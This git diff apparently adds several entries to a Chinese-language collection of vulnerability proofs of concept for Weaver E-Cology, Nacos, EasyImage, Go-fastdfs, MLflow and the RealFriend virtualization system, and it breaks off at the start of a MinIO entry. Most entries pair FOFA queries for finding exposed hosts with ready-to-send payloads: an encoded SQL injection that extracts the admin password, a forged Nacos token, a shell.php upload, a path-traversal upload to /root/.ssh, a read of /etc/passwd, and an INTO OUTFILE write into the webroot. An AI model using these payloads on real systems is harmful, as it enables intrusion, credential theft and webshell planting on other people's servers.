diff --git a/OA产品漏洞/images/image-20230417093344265.png b/OA产品漏洞/images/image-20230417093344265.png new file mode 100644 index 0000000..e488df3 Binary files /dev/null and b/OA产品漏洞/images/image-20230417093344265.png differ diff --git a/OA产品漏洞/images/image-20230417093412026.png b/OA产品漏洞/images/image-20230417093412026.png new file mode 100644 index 0000000..575b40b Binary files /dev/null and b/OA产品漏洞/images/image-20230417093412026.png differ diff --git a/OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md b/OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md new file mode 100644 index 0000000..9501d5a --- /dev/null +++ b/OA产品漏洞/泛微OA v9 E-Cology browser.jsp SQL注入漏洞.md 
@@ -0,0 +1,32 @@ +# 泛微OA v9 E-Cology browser.jsp SQL注入漏洞 + +## 漏洞描述 + +泛微OA E-Cology browser.jsp 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息,进一步进行攻击 + +## 漏洞影响 + +``` +泛微 E-Cology v9 +``` + +## FOFA + +``` +product="泛微-协同商务系统" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093344265](images/image-20230417093344265.png) + +验证POC, 将SQL语句进行3次URL编码 + +``` +asdasdasxx%' union select 1,(select password from HrmResourceManager where id=1) union select 1,'1 +/mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%3
3%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31 +``` + +![image-20230417093412026](images/image-20230417093412026.png) \ No newline at end of file diff --git a/README.md b/README.md index 0a5a220..fb06aed 100644 --- a/README.md +++ b/README.md @@ -121,6 +121,7 @@ * 泛微OA ln.FileDownload 任意文件读取漏洞 * 泛微OA sysinterfacecodeEdit.jsp 任意文件上传漏洞 * 泛微OA uploadOperation.jsp 任意文件上传 + * 泛微OA v9 E-Cology browser.jsp SQL注入漏洞 * 泛微OA weaver.common.Ctrl 任意文件上传漏洞 * 泛微OA WorkflowCenterTreeData SQL注入漏洞 * 用友 ERP-NC NCFindWeb 目录遍历漏洞 
@@ -191,7 +192,9 @@ * Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293 * Alibaba AnyProxy fetchBody 任意文件读取漏洞 * Alibaba Canal config 云密钥信息泄露漏洞 + * Alibaba Nacos secret.key默认密钥 未授权访问漏洞 * Alibaba Nacos 未授权访问漏洞 + * Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 * Appspace jsonprequest SSRF漏洞 CVE-2021-27670 * Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804 * Atlassian Bitbucket 登录绕过漏洞 @@ -219,6 +222,8 @@ * Dogtag PKI XML实体注入漏洞 CVE-2022-2414 * Dolibarr edit.php 远程命令执行漏洞 CVE-2022-40871 * E-message 越权访问漏洞 + * EasyImage down.php 任意文件读取漏洞 + * EasyImage manager.php 后台任意文件上传漏洞 * eGroupWare spellchecker.php 远程命令执行漏洞 * Evolucare Ecsimaging download_stats_dicom.php 任意文件读取漏洞 * Evolucare Ecsimaging new_movie.php 远程命令执行漏洞 @@ -233,6 +238,8 @@ * GitLab SSRF漏洞 CVE-2021-22214 * GitLab 任意文件读取导致RCE CVE-2020-10977 * GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914 + * Go-fastdfs GetClientIp 未授权访问漏洞 + * Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800 * Grafana mysql 后台任意文件读取漏洞 CVE-2019-19499 * Grafana plugins 任意文件读取漏洞 CVE-2021-43798 * H3C IMC dynamiccontent.properties.xhtm 远程命令执行 @@ -259,6 +266,7 @@ * MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543 * Metabase geojson 任意文件读取漏洞 CVE-2021-41277 * MKdocs 任意文件读取漏洞 CVE-2021-40978 + * MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177 * Nexus Repository Manger change-password 低权限修改管理员密码漏洞 CVE-2020-11444 * Nexus Repository Manger extdirect 后台远程命令执行 CVE-2020-10204 * Nexus Repository Manger extdirect 远程命令执行 CVE-2019-7238 @@ -350,6 +358,7 @@ * 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞 * 深信服 日志中心 c.php 远程命令执行漏洞 * 深信服 行为感知系统 c.php 远程命令执行漏洞 + * 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞 * 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 * 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞 * 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞 @@ -376,7 +385,6 @@ * 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437 * 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞 * 阿尔法科技 虚拟仿真实验室 未授权访问漏洞 - * 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 * 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113 * 章管家 Druid未授权访问漏洞 * 飞视美 视频会议系统 Struts2 远程命令执行漏洞 
@@ -509,6 +517,7 @@ * Microsoft Exchange 信息泄露漏洞 CVE-2020-17143 * Microsoft Exchange 远程命令执行 CVE-2021-27065 26857 26858 * MinIO SSRF漏洞 CVE-2021-21287 + * MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432 * MySQL UDF提权 * NVIDIA GPU显示驱动程序 信息泄露 CVE-2021-1056 * OpenSSH 命令注入漏洞 CVE-2020-15778 @@ -654,6 +663,7 @@ * 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371 * 悦泰节能 智能数据网关 resources 任意文件读取漏洞 * 惠尔顿 e地通 config.xml 信息泄漏漏洞 + * 才茂通信 网关 formping 远程命令执行漏洞 * 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328 * 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞 * 烽火 HG6245D info.asp 信息泄露漏洞 diff --git a/Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md b/Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md new file mode 100644 index 0000000..4893965 --- /dev/null +++ b/Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md @@ -0,0 +1,35 @@ +# Alibaba Nacos secret.key默认密钥 未授权访问漏洞 + +## 漏洞描述 + +Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞 + +## 漏洞影响 + +``` +Alibaba Nacos <= 2.2.0 +``` + +## FOFA + +``` +app="NACOS" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093555107](images/image-20230417093555107.png) + +漏洞原因是使用了固定的Key + +![image-20230417093624167](images/image-20230417093624167.png) + +验证POC + +``` +/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9 +``` + +![image-20230417093649928](images/image-20230417093649928.png) \ No newline at end of file diff --git a/Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md b/Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md new file mode 100644 index 0000000..ef77077 --- /dev/null +++ b/Web应用漏洞/Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md 
@@ -0,0 +1,22 @@ +# Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 + +## 漏洞描述 + +Alibaba otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。 + +参考链接: + +* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592 +* https://forum.ywhack.com/thread-115309-1-8.html + +## FOFA + +``` +title="Otter Manager" +``` + +## 漏洞复现 + +默认口令:`admin/admin` + +进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。 \ No newline at end of file diff --git a/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md b/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md new file mode 100644 index 0000000..546f437 --- /dev/null +++ b/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# EasyImage down.php 任意文件读取漏洞 + +## 漏洞描述 + +EasyImage down.php 文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件 + +## 漏洞影响 + +``` +EasyImage +``` + +## FOFA + +``` +app="EasyImage-简单图床" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094057151](images/image-20230417094057151.png) + +验证POC + +``` +/application/down.php?dw=./config/config.php +``` + +![image-20230417094115549](images/image-20230417094115549.png) \ No newline at end of file diff --git a/Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md b/Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md new file mode 100644 index 0000000..f301f3b --- /dev/null +++ b/Web应用漏洞/EasyImage manager.php 后台任意文件上传漏洞.md 
@@ -0,0 +1,86 @@ +# EasyImage manager.php 后台任意文件上传漏洞 + +## 漏洞描述 + +EasyImage manager.php 存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件到服务器获取服务器权限 + +## 漏洞影响 + +``` +EasyImage +``` + +## FOFA + +``` +app="EasyImage-简单图床" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094210473](images/image-20230417094210473.png) + +登陆后台后发送POC (通过任意文件读取获取账号密码) + +``` +POST /admin/manager.php?p= HTTP/1.1 +Host: +Accept: application/json +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +Cache-Control: no-cache +Content-Length: 1622 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUCF9Yq83AkaO6sv +Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680341989; auth=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22tossone%22%3Bi%3A1%3Bs%3A32%3A%22590368bca375c2f8fe93df7d253481e8%22%3B%7D; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1680342144; filemanager=sdeemhj3b9aeoretftrlijjh25 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 + +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzuuid" + +7e4fad9a-3545-4ed6-b655-b3e3a6b2978c +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzchunkindex" + +0 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dztotalfilesize" + +583 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzchunksize" + +10000000 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dztotalchunkcount" + +1 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="dzchunkbyteoffset" + +0 +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="p" + + +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="fullpath" + +shell.php +------WebKitFormBoundaryEUCF9Yq83AkaO6sv +Content-Disposition: form-data; name="file"; filename="shell.php" +Content-Type: 
application/octet-stream + +234 + +------WebKitFormBoundaryEUCF9Yq83AkaO6sv-- +``` + +![image-20230417094255974](images/image-20230417094255974.png) + +上传访问地址为 + +``` +/i/shell.php +``` \ No newline at end of file diff --git a/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md b/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md new file mode 100644 index 0000000..641729e --- /dev/null +++ b/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md @@ -0,0 +1,65 @@ +# Go-fastdfs GetClientIp 未授权访问漏洞 + +## 漏洞描述 + +Go-fastdfs GetClientIp方法存在XFF头绕过漏洞,攻击者通过漏洞可以未授权调用接口,获取配置文件等敏感信息 + +## 漏洞影响 + +``` +Go-fastdfs +``` + +## FOFA + +``` +"go-fastdfs" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094508409](images/image-20230417094508409.png) + +调用读取配置接口,返回 ip 不允许访问 + +``` +/group1/reload?action=get +``` + +![image-20230417094521737](images/image-20230417094521737.png) + +追踪错误信息代码 + +![image-20230417094533985](images/image-20230417094533985.png) + +![image-20230417094542486](images/image-20230417094542486.png) + +跟一下 GetClientIp方法,这里会从 X-Forwarded-For 等参数获取值 + +![image-20230417094554500](images/image-20230417094554500.png) + +回到调用的起点,验证方法为调用 IsPeer 参数 + +![image-20230417094604965](images/image-20230417094604965.png) + +![image-20230417094613037](images/image-20230417094613037.png) + +这里主要是验证获取到的值是否为配置中的 AdminIps + +![image-20230417094623353](images/image-20230417094623353.png) + +在配置文件 cfg.json 中 admin_ips 默认为 127.0.0.1 (可被爆破) + +![image-20230417100058531](images/image-20230417100058531.png) + +所以通过设置 X-Forwarded-For 就可以绕过接口调用限制,执行修改配置文件等操作,验证POC + +``` +/group1/reload?action=get + +X-Forwarded-For: 127.0.0.1 +``` + +![image-20230417100112324](images/image-20230417100112324.png) \ No newline at end of file diff --git a/Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md b/Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md new file mode 100644 index 0000000..ede1c37 --- /dev/null +++ b/Web应用漏洞/Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800.md 
@@ -0,0 +1,78 @@ +# Go-fastdfs upload 任意文件上传漏洞 CVE-2023-1800 + +## 漏洞描述 + +Go-fastdfs upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,攻击服务器 + +## 漏洞影响 + +``` +Go-fastdfs +``` + +## FOFA + +``` +"go-fastdfs" +``` + +## 漏洞复现 + +主页面 + +![image-20230417094508409](images/image-20230417094508409.png) + +验证POC + +``` +POST /group1/upload HTTP/1.1 +Host: +Content-Length: 951 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryigj9M9EJykZc9u53 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="file"; filename="id" +Content-Type: application/octet-stream + +test +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="scene" + +default +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="filename" + +id_rsa +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="output" + +json2 +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="path" + +../../../../../root/.ssh +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="code" + + +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="auth_token" + + +------WebKitFormBoundaryigj9M9EJykZc9u53 +Content-Disposition: form-data; name="submit" + +upload +------WebKitFormBoundaryigj9M9EJykZc9u53-- +``` + +![image-20230417100221820](images/image-20230417100221820.png) + +![image-20230417100230696](images/image-20230417100230696.png) \ No newline at end of file 
diff --git a/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md b/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md new file mode 100644 index 0000000..e8e6744 --- /dev/null +++ b/Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md @@ -0,0 +1,51 @@ +# MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177 + +## 漏洞描述 + +使用 MLflow 模型注册表托管 MLflow 开源项目的用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器(例如,通过使用云 VPC、入站请求的 IP 白名单或身份验证 /授权中间件)。 + +此问题仅影响运行 mlflow server和 mlflow ui命令。 不使用的集成 mlflow server或者 mlflow ui不受影响; 例如,Azure Machine Learning 上的 Databricks Managed MLflow 产品和 MLflow 不使用这些命令,并且不会以任何方式受到这些漏洞的影响。 + +## 漏洞影响 + +``` +MLflow < 2.2.1 +``` + +## FOFA + +``` +app.name="MLflow" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417093814404](images/image-20230417093814404.png) + +验证POC + +``` +POST /ajax-api/2.0/mlflow/registered-models/create +Content-Type: application/json + +{"name": "testfile"} +``` + +![image-20230417093836998](images/image-20230417093836998.png) + +``` +POST /ajax-api/2.0/mlflow/model-versions/create +Content-Type: application/json + +{"name": "testfile", "source": "/etc"} +``` + +![image-20230417093851779](images/image-20230417093851779.png) + +``` +/model-versions/get-artifact?path=passwd&name=testfile&version=1 +``` + +![image-20230417093907298](images/image-20230417093907298.png) \ No newline at end of file diff --git a/Web应用漏洞/images/image-20230417093555107.png b/Web应用漏洞/images/image-20230417093555107.png new file mode 100644 index 0000000..3a9d9f9 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093555107.png differ diff --git a/Web应用漏洞/images/image-20230417093624167.png b/Web应用漏洞/images/image-20230417093624167.png new file mode 100644 index 0000000..179971e Binary files /dev/null and b/Web应用漏洞/images/image-20230417093624167.png differ 
diff --git a/Web应用漏洞/images/image-20230417093649928.png b/Web应用漏洞/images/image-20230417093649928.png new file mode 100644 index 0000000..d204d32 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093649928.png differ diff --git a/Web应用漏洞/images/image-20230417093814404.png b/Web应用漏洞/images/image-20230417093814404.png new file mode 100644 index 0000000..608c8ca Binary files /dev/null and b/Web应用漏洞/images/image-20230417093814404.png differ diff --git a/Web应用漏洞/images/image-20230417093836998.png b/Web应用漏洞/images/image-20230417093836998.png new file mode 100644 index 0000000..037ad3b Binary files /dev/null and b/Web应用漏洞/images/image-20230417093836998.png differ diff --git a/Web应用漏洞/images/image-20230417093851779.png b/Web应用漏洞/images/image-20230417093851779.png new file mode 100644 index 0000000..e6d9502 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093851779.png differ diff --git a/Web应用漏洞/images/image-20230417093907298.png b/Web应用漏洞/images/image-20230417093907298.png new file mode 100644 index 0000000..722df64 Binary files /dev/null and b/Web应用漏洞/images/image-20230417093907298.png differ diff --git a/Web应用漏洞/images/image-20230417094057151.png b/Web应用漏洞/images/image-20230417094057151.png new file mode 100644 index 0000000..5b803c5 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094057151.png differ diff --git a/Web应用漏洞/images/image-20230417094115549.png b/Web应用漏洞/images/image-20230417094115549.png new file mode 100644 index 0000000..e9c2b41 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094115549.png differ diff --git a/Web应用漏洞/images/image-20230417094210473.png b/Web应用漏洞/images/image-20230417094210473.png new file mode 100644 index 0000000..d0df2ff Binary files /dev/null and b/Web应用漏洞/images/image-20230417094210473.png differ 
diff --git a/Web应用漏洞/images/image-20230417094255974.png b/Web应用漏洞/images/image-20230417094255974.png new file mode 100644 index 0000000..1dc1115 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094255974.png differ diff --git a/Web应用漏洞/images/image-20230417094508409.png b/Web应用漏洞/images/image-20230417094508409.png new file mode 100644 index 0000000..bb07780 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094508409.png differ diff --git a/Web应用漏洞/images/image-20230417094521737.png b/Web应用漏洞/images/image-20230417094521737.png new file mode 100644 index 0000000..3921eb9 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094521737.png differ diff --git a/Web应用漏洞/images/image-20230417094533985.png b/Web应用漏洞/images/image-20230417094533985.png new file mode 100644 index 0000000..06953fd Binary files /dev/null and b/Web应用漏洞/images/image-20230417094533985.png differ diff --git a/Web应用漏洞/images/image-20230417094542486.png b/Web应用漏洞/images/image-20230417094542486.png new file mode 100644 index 0000000..a67f629 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094542486.png differ diff --git a/Web应用漏洞/images/image-20230417094554500.png b/Web应用漏洞/images/image-20230417094554500.png new file mode 100644 index 0000000..cf2e40b Binary files /dev/null and b/Web应用漏洞/images/image-20230417094554500.png differ diff --git a/Web应用漏洞/images/image-20230417094604965.png b/Web应用漏洞/images/image-20230417094604965.png new file mode 100644 index 0000000..c4dd6a4 Binary files /dev/null and b/Web应用漏洞/images/image-20230417094604965.png differ diff --git a/Web应用漏洞/images/image-20230417094613037.png b/Web应用漏洞/images/image-20230417094613037.png new file mode 100644 index 0000000..6f88efa Binary files /dev/null and b/Web应用漏洞/images/image-20230417094613037.png differ 
diff --git a/Web应用漏洞/images/image-20230417094623353.png b/Web应用漏洞/images/image-20230417094623353.png new file mode 100644 index 0000000..c3a4c8a Binary files /dev/null and b/Web应用漏洞/images/image-20230417094623353.png differ diff --git a/Web应用漏洞/images/image-20230417100058531.png b/Web应用漏洞/images/image-20230417100058531.png new file mode 100644 index 0000000..062a95a Binary files /dev/null and b/Web应用漏洞/images/image-20230417100058531.png differ diff --git a/Web应用漏洞/images/image-20230417100112324.png b/Web应用漏洞/images/image-20230417100112324.png new file mode 100644 index 0000000..b9efe82 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100112324.png differ diff --git a/Web应用漏洞/images/image-20230417100221820.png b/Web应用漏洞/images/image-20230417100221820.png new file mode 100644 index 0000000..b8213d5 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100221820.png differ diff --git a/Web应用漏洞/images/image-20230417100230696.png b/Web应用漏洞/images/image-20230417100230696.png new file mode 100644 index 0000000..a5bb060 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100230696.png differ diff --git a/Web应用漏洞/images/image-20230417100516425.png b/Web应用漏洞/images/image-20230417100516425.png new file mode 100644 index 0000000..054878a Binary files /dev/null and b/Web应用漏洞/images/image-20230417100516425.png differ diff --git a/Web应用漏洞/images/image-20230417100529493.png b/Web应用漏洞/images/image-20230417100529493.png new file mode 100644 index 0000000..ccc8672 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100529493.png differ diff --git a/Web应用漏洞/images/image-20230417100544162.png b/Web应用漏洞/images/image-20230417100544162.png new file mode 100644 index 0000000..ad1f320 Binary files /dev/null and b/Web应用漏洞/images/image-20230417100544162.png differ 
diff --git a/Web应用漏洞/images/image-20230417100554583.png b/Web应用漏洞/images/image-20230417100554583.png new file mode 100644 index 0000000..c4a4a0d Binary files /dev/null and b/Web应用漏洞/images/image-20230417100554583.png differ diff --git a/Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md b/Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md new file mode 100644 index 0000000..c974121 --- /dev/null +++ b/Web应用漏洞/瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞.md @@ -0,0 +1,41 @@ +# 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞 + +## 漏洞描述 + +瑞友 应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞,由于参数传入没有进行过滤导致存在SQL注入,攻击者通过漏洞可以获取数据库敏感信息 + +## 漏洞影响 + +``` +瑞友应用虚拟化系统 7.0.2.1 +``` + +## FOFA + +``` +"CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统" +``` + +## 漏洞复现 + +登陆页面 + +![image-20230417100516425](images/image-20230417100516425.png) + +在 GetBSAppUrl 方法中存在SQL注入漏洞,通过漏洞可以写入Webshell文件 + +![image-20230417100529493](images/image-20230417100529493.png) + +验证POC + +``` +/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123 +``` + +![image-20230417100544162](images/image-20230417100544162.png) + +``` +/test7.php +``` + +![image-20230417100554583](images/image-20230417100554583.png) \ No newline at end of file diff --git a/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md b/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md deleted file mode 100644 index e0033f6..0000000 --- a/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md +++ /dev/null 
@@ -1,22 +0,0 @@ -# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 - -## 漏洞描述 - -阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。 - -参考链接: - -* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592 -* https://forum.ywhack.com/thread-115309-1-8.html - -## FOFA - -``` -title="Otter Manager" -``` - -## 漏洞复现 - -默认口令:`admin/admin` - -进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。 \ No newline at end of file diff --git a/服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md b/服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md new file mode 100644 index 0000000..7062c1f --- /dev/null +++ b/服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md @@ -0,0 +1,31 @@ +# MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432 + +## 漏洞描述 + +Minio 